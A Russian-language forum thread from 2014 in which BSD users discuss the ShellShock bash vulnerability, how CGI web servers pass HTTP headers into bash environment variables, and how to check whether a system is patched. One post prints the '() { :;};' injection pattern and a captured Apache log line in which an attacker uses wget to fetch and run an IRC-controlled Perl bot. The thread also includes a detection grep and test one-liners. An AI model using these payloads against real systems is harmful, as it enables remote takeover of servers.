ShellShock vulnerability (!)

Обсуждение всяких разных новостей.
BSD_daemon
ефрейтор
Сообщения: 63
Зарегистрирован: 2010-10-09 21:51:17
Откуда: Из тех ворот откуда весь народ

ShellShock vulnerability (!)

Непрочитанное сообщение BSD_daemon » 2014-09-26 9:21:22

На выходные "подарунчик" ловите, похлеще "кровавого сердца" будет мля
Багу в Bash-е расщекотили которая два десятка лет спала
Web серваки работающиие через CGI под прицелом номер один: так что- "хороших выходных"

http://web.nvd.nist.gov/view/vuln/detai ... -2014-6271
http://web.nvd.nist.gov/view/vuln/detai ... -2014-7169
I also known as: "Нефиг_чем_заняться"

Аватара пользователя
Alex Keda
стреляли...
Сообщения: 34889
Зарегистрирован: 2004-10-18 14:25:19
Откуда: Made in USSR
Контактная информация:

Re: ShellShock vulnerability (!)

Непрочитанное сообщение Alex Keda » 2014-09-26 12:54:42

не юзаю баш
и другим не советую.

есть tcsh, он всё может.
есть sh - на нём скрпиты пишутся.

всё остальное - ф топку
Убей их всех! Бог потом рассортирует...

BSD_daemon
ефрейтор
Сообщения: 63
Зарегистрирован: 2010-10-09 21:51:17
Откуда: Из тех ворот откуда весь народ

Re: ShellShock vulnerability (!)

Непрочитанное сообщение BSD_daemon » 2014-09-26 16:15:36

Согласен на все 100%, но к сожалению половине интернета глубоко срать на наши советы, да и БЗДевые поделки типа Apple тоже по дефолту юзают башатину, а любителей "самого крутого" с распальцованными пальчиками очень даже предостаточно :(
I also known as: "Нефиг_чем_заняться"

FiL
ст. лейтенант
Сообщения: 1318
Зарегистрирован: 2010-02-05 0:21:40

Re: ShellShock vulnerability (!)

Непрочитанное сообщение FiL » 2014-09-30 4:53:31

Я себя чувствую последним ламером, но никак не могу понять как этой багой пользоваться.
Допустем у меня есть сервер со старым непропатченым башем. И допустим, что у меня есть веб-сервер на той самой машине. И даже допустим, что там часть скриптов cgi. И что? Как удаленный хакер должен объявить переменные для баша, чтоб они потом исполнились?

BSD_daemon
ефрейтор
Сообщения: 63
Зарегистрирован: 2010-10-09 21:51:17
Откуда: Из тех ворот откуда весь народ

Re: ShellShock vulnerability (!)

Непрочитанное сообщение BSD_daemon » 2014-09-30 6:04:22

FiL писал(а): И даже допустим, что там часть скриптов cgi. И что?

CGI скрипты запускаются из под дефолтового шела.
Баш имеет такую фичу как подхватывать из enviroment функции.
Некорректный парсинг функций из ENV приводит к тому, что выполняется следующая команда после баго фунции, как ниже

Код: Выделить всё

() { :;}; здесь любая легитимная шелл команда

т.е. подсунув это говно в enviroment можно манипулировать удаленной машиной как из шелла.
Послав простой HTTP запрос с левым HTTP header-ом, запрос напрямую сбрасывется в среду, которая подхватывается башем и .... бум - ВЫПОЛНЯЕТСЯ

Как удаленный хакер должен объявить переменные для баша, чтоб они потом исполнились?

Делаю прям сейчас на боевом серваке :

Код: Выделить всё

egrep '\{\s*\:'  /var/log/apache2/*.log


Свежак result:

Код: Выделить всё

access.log:xx.xx.xx.xx - - [29/Sep/2014:02:34:12 -0500] "GET / HTTP/1.0" 403 199 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z IP.of.govno.servera/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""


ec.z - старый модефицированный арабский perl-o script который отдает управление машиной в IRC

На BSD-вых машинах где дефолтоый шелл - допотопный баш 3 (разговор о чудо "крутых" машинах от компании по производству чудо яблок)
баш провоцируется чуток по другому:

Код: Выделить всё

env X='() { (a)=>\' /bin/bash -c "echo date"; cat echo

Если видим текущую дату то ... писец
I also known as: "Нефиг_чем_заняться"

Аватара пользователя
Alex Keda
стреляли...
Сообщения: 34889
Зарегистрирован: 2004-10-18 14:25:19
Откуда: Made in USSR
Контактная информация:

Re: ShellShock vulnerability (!)

Непрочитанное сообщение Alex Keda » 2014-09-30 10:02:04

Код: Выделить всё

[root@vds01 ~]# cd /tmp/
[root@vds01 tmp]# wget --no-check-certificate https://raw.githubusercontent.com/hannob/bashcheck/master/bashcheck
--2014-09-30 11:01:24--  https://raw.githubusercontent.com/hannob/bashcheck/master/bashcheck
Resolving raw.githubusercontent.com... 185.31.17.133
Connecting to raw.githubusercontent.com|185.31.17.133|:443... connected.
WARNING: certificate common name `www.github.com' doesn't match requested host name `raw.githubusercontent.com'.
HTTP request sent, awaiting response... 200 OK
Length: 1375 (1.3K) [text/plain]
Saving to: `bashcheck'

100%[===============================================>] 1,375       --.-K/s   in 0s     

2014-09-30 11:01:25 (15.2 MB/s) - `bashcheck' saved [1375/1375]

[root@vds01 tmp]# chmod +x bashcheck
[root@vds01 tmp]# ./bashcheck
Not vulnerable to CVE-2014-6271 (original shellshock)
Not vulnerable to CVE-2014-7169 (taviso bug)
Not vulnerable to CVE-2014-7186 (redir_stack bug)
Test for CVE-2014-7187 not reliable without address sanitizer
Variable function parser inactive, likely safe from unknown parser bugs
[root@vds01 tmp]#
Убей их всех! Бог потом рассортирует...

FiL
ст. лейтенант
Сообщения: 1318
Зарегистрирован: 2010-02-05 0:21:40

Re: ShellShock vulnerability (!)

Непрочитанное сообщение FiL » 2014-09-30 15:59:30

BSD_daemon писал(а):Послав простой HTTP запрос с левым HTTP header-ом, запрос напрямую сбрасывется в среду, которая подхватывается башем и .... бум - ВЫПОЛНЯЕТСЯ


Спасибо за объяснение. Про переменные среды, посылаемые через http header я не подумал (не знал?).
Последний раз редактировалось FiL 2014-09-30 16:03:54, всего редактировалось 1 раз.

Аватара пользователя
Alex Keda
стреляли...
Сообщения: 34889
Зарегистрирован: 2004-10-18 14:25:19
Откуда: Made in USSR
Контактная информация:

Re: ShellShock vulnerability (!)

Непрочитанное сообщение Alex Keda » 2014-09-30 16:01:55

я, кстати, тоже не знал.
тока это не проблема вебсервера, это проблема баша, цепляющего при обработке cgi скрипта весь мусор в переменные
Убей их всех! Бог потом рассортирует...

FiL
ст. лейтенант
Сообщения: 1318
Зарегистрирован: 2010-02-05 0:21:40

Re: ShellShock vulnerability (!)

Непрочитанное сообщение FiL » 2014-09-30 16:05:57

Подумав (это вообще занятие мне не свойственно), понял, что других способов общения клиента со скриптом просто быть не может. Таки веб сервер тут не виноват. Жизнь у него такая. Как страшно жить (с)

Аватара пользователя
Alex Keda
стреляли...
Сообщения: 34889
Зарегистрирован: 2004-10-18 14:25:19
Откуда: Made in USSR
Контактная информация:

Re: ShellShock vulnerability (!)

Непрочитанное сообщение Alex Keda » 2014-09-30 16:23:20

ну, поправят...
главное вовремя обновицца =))
Убей их всех! Бог потом рассортирует...

Аватара пользователя
dekloper
ст. лейтенант
Сообщения: 1280
Зарегистрирован: 2008-02-24 15:43:19
Откуда: давно здесь сидим..
Контактная информация:

Re: ShellShock vulnerability (!)

Непрочитанное сообщение dekloper » 2014-11-24 12:09:52

BSD_daemon писал(а):Согласен на все 100%, но к сожалению половине интернета глубоко срать на наши советы, да и БЗДевые поделки типа Apple тоже по дефолту юзают башатину, а любителей "самого крутого" с распальцованными пальчиками очень даже предостаточно :(

и срать на них :fool:
ТОВАгИЩИ! БгАТЬЯ И СЕСТгЫ! ДОЛОЙ гАВНОДУШИЕ!


Вернуться в «Новости»

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и 2 гостя